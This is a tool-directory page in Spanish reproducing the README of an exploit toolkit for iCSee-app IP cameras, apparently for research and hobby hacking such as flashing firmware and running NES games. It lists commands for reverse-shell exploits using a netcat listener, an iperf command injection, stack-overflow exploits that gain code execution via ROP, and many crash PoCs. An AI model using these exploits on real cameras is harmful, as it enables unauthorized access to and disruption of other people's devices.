Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
iCSeeU — Este es un conjunto de herramientas/PoCs/exploits para cámaras que usan la aplicación iCSee. Y sí, ¡puede ejecutar juegos de NES! | Kitploit
Herramientas/GitHubGitHub/lr-m/icseeu
Seguridad de Sistemas EmbebidosSeguridad IoTExplotaciónIngeniería InversaDepuradoresFuzzingCTFSeguridad de HardwarePapers e InvestigaciónAprendizaje y EducaciónAnálisis de FirmwareExplotación de Binarios
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHublr-m/icseeu

iCSeeU

Este es un conjunto de herramientas/PoCs/exploits para cámaras que usan la aplicación iCSee. Y sí, ¡puede ejecutar juegos de NES!

Ver Repositorio

Este es un conjunto de herramientas/PoCs/exploits que se pueden utilizar en cámaras de videollamada iCSee a través de LAN (y quizás también en cámaras que no son de videollamada). Esto podría usarse fácilmente para flashear firmwares alternativos como reemplazo del método de actualización por tarjeta SD.

Nota: Cualquier exploit de corrupción de memoria solo funcionará si la versión de firmware de tu cámara es V5.00.R02.000949U5.10000.141324.0000010 o V5.00.R02.000807E5.10000.346724.0000010 - estos exploits dependen de offsets fijos, que cambian cada vez que se compila el firmware.

Blogs

[0] Enumeración, Desmontaje y Extracción de Firmware

[1] Aprendiendo el Lenguaje de las Cámaras

[2] Encontrando Desbordamientos de Enteros Inútiles + Algunos Bugs Útiles

[3] Muerte por Desbordamientos de Pila + Diversión con Canary

[4] Explotando Todo

[5] Cámara Diferente, Misma App

[6] Vindicación + Exploit Completo de Corrupción de Memoria en la Segunda Cámara

[7] Emulando Juegos de NES en la Cámara

Dependencias

  • pycryptodome : Para criptografía de inicio de sesión RSA
  • pwntools : Para shellcode
  • pyftpdlib : Para servidor FTP
  • pynput : Para entrada de teclado NES

Funcionalidad

get_system_info

Esto utiliza el método get_system_info para obtener información de la cámara a través del puerto 34567.

root@kitploit:~
python3 icseeu.py get_system_info
root@kitploit:~
{
  "Name": "SystemInfo",
  "Ret": 100,
  "SessionID": "0x0001869f",
  "SystemInfo": {
    "AlarmInChannel": 0,
    "AlarmOutChannel": 0,
    "AudioInChannel": 1,
    "BuildTime": "2024-06-27 10:33:41",
    "CombineSwitch": 0,
    "DeviceModel": "IPC_GK7201V300_G2-WR-V_S38",
    "DeviceRunTime": "0x000026c6",
    "DeviceType": 7,
    "DigChannel": 0,
    "EncryptVersion": "Unknown",
    "ExtraChannel": 0,
    "HardWare": "IPC_GK7201V300_G2-WR-V_S38",
    "HardWareVersion": "Unknown",
    "Pid": "A909409U5000000N",
    "SerialNo": "bf7816d59506ec06",
    "SoftWareVersion": "V5.00.R02.000949U5.10000.141324.0000010",
    "TalkInChannel": 1,
    "TalkOutChannel": 1,
    "UpdataTime": "",
    "UpdataType": "0x00000000",
    "VideoInChannel": 1,
    "VideoOutChannel": 1
  }
}

ftp_get_logs

Utiliza una funcionalidad de texto residual para extraer registros del dispositivo (los registros terminan en FTPTestDir/Test).

root@kitploit:~
python3 icseeu.py ftp_get_logs

Exploits

gdb_revshell

Explota una vulnerabilidad de escritura de archivos en la tarjeta SD, y la vulnerabilidad de ejecución binaria iperf que permite la ejecución remota de un binario presente en la tarjeta SD, para obtener una shell inversa e iniciar un depurador GDB que se adjunta al proceso principal App.

Terminal 1:

root@kitploit:~
nc -l 1234

Terminal 2:

root@kitploit:~
python3 icseeu.py gdb_revshell

Terminal 3:

root@kitploit:~
gdb-multiarch
gef-remote 192.168.188.2 8888

Nota: No detengas el programa por más de 30 segundos o el watchdog se quejará y el proceso App se reiniciará!

Nota 2: Es posible que necesites modificar las direcciones IP hardcodeadas en el payload (GDB_Revshell/remote_mgmt.c) para que sean la IP de tu máquina en la LAN y reconstruir el payload.

gdb_revshell_inject

Explota una vulnerabilidad de escritura de archivos en la tarjeta SD, y la vulnerabilidad de inyección de comandos iperf que permite la ejecución remota de un binario presente en la tarjeta SD, para obtener una shell inversa e iniciar un depurador GDB que se adjunta al proceso principal App.

Esto es útil para dispositivos que ya tienen un binario iperf presente, lo que impide el otro método.

Terminal 1:

root@kitploit:~
nc -l 1234

Terminal 2:

root@kitploit:~
python3 icseeu.py gdb_revshell_inject

Terminal 3:

root@kitploit:~
gdb-multiarch
gef-remote 192.168.188.2 8888

Nota: No detengas el programa por más de 30 segundos o el watchdog se quejará y el proceso App se reiniciará!

Nota 2: Es posible que necesites modificar las direcciones IP hardcodeadas en el payload (GDB_Revshell/remote_mgmt.c) para que sean la IP de tu máquina en la LAN y reconstruir el payload.

iperf_inject_exploit

Explota la inyección de comandos iperf para establecer una shell inversa.

Terminal 1:

root@kitploit:~
nc -l 1234

Terminal 2:

root@kitploit:~
python3 icseeu.py iperf_inject_exploit

Nota: Es posible que necesites modificar las direcciones IP hardcodeadas en el payload (Revshell_Inject/remote_mgmt.c) para que sean la IP de tu máquina en la LAN y reconstruir el payload.

Exploit de Desbordamiento de Pila para GOKE GK7201

Estos son exploits para el segundo desbordamiento de pila en el manejador del tipo de mensaje 0x7d8. Este desbordamiento es interesante porque nos permite eludir el canary de pila y obtener ejecución.

Necesitarás construir el payload del despachador antes de que estos funcionen (ejecuta make en el directorio PayloadDispatcher), y el payload que quieras ejecutar en la cámara ejecutando make en los directorios respectivos (por ejemplo, ImageDisplay).

Notas:

  • La versión de firmware de la cámara debe ser V5.00.R02.000949U5.10000.141324.0000010 (no puedo garantizar que funcione en otras)

screenflash

Demuestra que tenemos ejecución de código al hacer parpadear la pantalla.

root@kitploit:~
python3 icseeu.py exploit_goke screenflash

rgb

Demuestra que tenemos control de la pantalla al hacer parpadear colores RGB.

root@kitploit:~
python3 icseeu.py exploit_goke rgb

imagedisplay

Utiliza la escritura de archivos para cargar una imagen RGB 5:6:5 cruda, ejecuta ffmpeg -i image.jpg -vf scale=240:320 -c:v rawvideo -pix_fmt rgb565 -f rawvideo image.raw en una imagen en el directorio para obtener un archivo image.raw en el directorio ImageDisplay para que esto funcione. La imagen se mostrará en la pantalla.

root@kitploit:~
python3 icseeu.py exploit_goke imagedisplay

buttontest

Demuestra que podemos leer el estado de los botones, parpadea un color cuando se detecta que uno de los botones ha sido presionado.

root@kitploit:~
python3 icseeu.py exploit_goke buttontest

pong

Una implementación mínima del juego Pong que demuestra que tenemos control de la pantalla y los botones frontales, también demuestra un payload ligeramente más complejo.

root@kitploit:~
python3 icseeu.py exploit_goke pong

nes

Un emulador de NES portado que puede ejecutar el rom.nes colocado en el directorio GOKE_Payloads/nes, ejecuta make en GOKE_Payloads/nes/smolnes y GOKE_Payload/nes para generar binarios.

root@kitploit:~
python3 icseeu.py exploit_goke nes

Exploit de Desbordamiento de Pila para XM530V200WX1

Este es un exploit para un desbordamiento de pila en otra cámara sin canaries de pila, pero con NX. Escribí una cadena ROP para pivotar la pila y obtener ejecución de una cadena ROP grande; esta cadena ROP mapea memoria ejecutable, carga el contenido de un archivo en la memoria, crea un hilo que lo ejecuta, luego arregla el estado de la pila y continúa la ejecución.

Necesitarás construir el payload antes de que estos funcionen, ejecuta make en los directorios respectivos (por ejemplo, ImageDisplay).

Notas:

  • Este exploit es bastante poco fiable, funciona aproximadamente el 40-50% de las veces (no le gusta generar hilos por razones desconocidas).
  • La versión de firmware de la cámara debe ser V5.00.R02.000807E5.10000.346724.0000010 (no puedo garantizar que funcione en otras)

screenflash

Demuestra que tenemos ejecución de código al hacer parpadear la pantalla.

root@kitploit:~
python3 icseeu.py exploit_xm530 screenflash

rgb

Demuestra que tenemos control de la pantalla al hacer parpadear colores RGB.

root@kitploit:~
python3 icseeu.py exploit_xm530 rgb

imagedisplay

Utiliza la escritura de archivos para cargar una imagen RGB 5:6:5 cruda, ejecuta ffmpeg -i image.jpg -vf scale=240:320 -c:v rawvideo -pix_fmt rgb565be -f rawvideo image.raw en una imagen en el directorio para obtener un archivo image.raw en el directorio ImageDisplay para que esto funcione. La imagen se mostrará en la pantalla.

root@kitploit:~
python3 icseeu.py exploit_xm530 imagedisplay

PoC

Más detalles de estas pruebas de concepto (y sus causas subyacentes) están en los blogs al principio de este readme.

integer_underflow_http

Esta PoC causa un bloqueo debido a un subdesbordamiento de enteros en el servidor HTTP.

root@kitploit:~
python3 icseeu.py integer_underflow_http

iperf_run

Esta PoC ejecutará el archivo almacenado en la tarjeta SD bajo iperf/iperf (ya sea script ash o binario).

root@kitploit:~
python3 icseeu.py iperf_run

iperf_inject

Esta PoC ejecutará el comando reboot a través de una inyección de comandos; el archivo iperf/iperf debe existir en la tarjeta SD para que funcione.

root@kitploit:~
python3 icseeu.py iperf_inject

assert_trigger_0x41a

Esta PoC activa una aserción debido a una gran asignación en el manejador de tipo de mensaje 0x41a (causando un bloqueo).

root@kitploit:~
python3 icseeu.py assert_trigger_0x41a

integer_overflow_0x41a

Esta PoC provoca un bloqueo debido a un desbordamiento de enteros que causa una extraña lectura fuera de límites en el manejador de mensajes 0x41a.

root@kitploit:~
python3 icseeu.py integer_overflow_0x41a

stack_overflow_0x43a

Esta PoC provoca un bloqueo debido a un desbordamiento de pila en el manejador de mensajes para el tipo 0x43a.

root@kitploit:~
python3 icseeu.py stack_overflow_0x43a

stack_overflow_0x438_1

Esta PoC provoca un bloqueo debido al primer desbordamiento de pila en el manejador de mensajes para el tipo 0x438.

root@kitploit:~
python3 icseeu.py stack_overflow_0x438_1

stack_overflow_0x438_2

Esta PoC provoca un bloqueo debido al segundo desbordamiento de pila en el manejador de mensajes para el tipo 0x438.

root@kitploit:~
python3 icseeu.py stack_overflow_0x438_2

stack_overflow_0xdac

Esta PoC provoca un bloqueo debido a un desbordamiento de pila en el manejador de mensajes para el tipo 0xdac.

root@kitploit:~
python3 icseeu.py stack_overflow_0xdac

stack_overflow_0x5a4

Esta PoC provoca un bloqueo debido a un desbordamiento de pila en el manejador de mensajes para el tipo 0x5a4.

root@kitploit:~
python3 icseeu.py stack_overflow_0x5a4

stack_overflow_0x414

Esta PoC provoca un bloqueo debido a un desbordamiento de pila en el manejador de mensajes para el tipo 0x414.

root@kitploit:~
python3 icseeu.py stack_overflow_0x414

stack_overflow_0x410_1

Esta PoC provoca un bloqueo debido al primer desbordamiento de pila en el manejador de mensajes para el tipo 0x410.

root@kitploit:~
python3 icseeu.py stack_overflow_0x438_1

stack_overflow_0x410_2

Esta PoC provoca un bloqueo debido al segundo desbordamiento de pila en el manejador de mensajes para el tipo 0x410.

root@kitploit:~
python3 icseeu.py stack_overflow_0x410_2

stack_overflow_0x5a8

Esta PoC provoca un bloqueo debido a un desbordamiento de pila en el manejador de mensajes para el tipo 0x5a8.

root@kitploit:~
python3 icseeu.py stack_overflow_0x5a8

stack_overflow_0x41e

Esta PoC provoca un bloqueo debido a un desbordamiento de pila en el manejador de mensajes para el tipo 0x41e.

root@kitploit:~
python3 icseeu.py stack_overflow_0x41e

stack_overflow_0x7d8_1

Esta PoC provoca un bloqueo debido al primer desbordamiento de pila en el manejador de mensajes para el tipo 0x7d8.

root@kitploit:~
python3 icseeu.py stack_overflow_0x7d8_1

stack_overflow_0x7d8_2

Esta PoC provoca un bloqueo debido al segundo desbordamiento de pila en el manejador de mensajes para el tipo 0x7d8.

root@kitploit:~
python3 icseeu.py stack_overflow_0x7d8_2

stack_overflow_0x8a6

Esta PoC provoca un bloqueo debido a un desbordamiento de pila en el manejador de mensajes para el tipo 0x8a6 (no presente en todas las cámaras).

root@kitploit:~
python3 icseeu.py stack_overflow_0x8a6
Descargar herramienta